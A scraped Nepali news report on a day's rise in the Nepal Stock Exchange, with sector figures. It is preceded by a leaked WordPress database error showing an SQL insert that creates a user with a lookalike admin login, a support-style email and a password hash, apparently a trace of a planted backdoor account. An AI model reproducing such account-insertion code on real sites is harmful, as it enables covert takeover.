WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bjr52fvWm4vnNgjYiVU0rEg5bGKq1b.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 18:21:46', '', 'admlnlx', 'admlnlx')
काठमाडौँ,मंसिर ३० –
लगातार घट्दै आएको धितोपत्र बजार आज भने दोहोरो अङ्कले बढेको छ ।
नेपाल स्टक एक्स्चेन्जका अनुसार बजार १३।९८ प्रतिशतले बढेको हो । कुल १३८ कम्पनीको छ लाख ६८ हजार ९२५ कित्ता सेयर रु ४९ करोड ३९ लाख ३० हजार ५०५ मूल्यमा खरिद बिक्री भएको छ ।
‘क’ वर्गका सेयरको मापन गर्ने सेन्सेटिभ इन्डेक्स पनि आज २।८५ प्रतिशतले बढेको छ । आज उत्पादन कम्पनीको बाहेक अन्य समूहका सेयर भने बढेको छ । स्टकका अनुसार बैंकिङ ०।९३, होटल १।८२, विकास बैंक १।२९, जलविद्युत् ०।४७, फाइनान्स ०।९ र बिमा १।२८ प्रतिशतले बढेको छ । उत्पादन समूह ०।२९ घटेको छ भने अन्य समूह सामान्य अवस्थामा रहेको छ । – रासस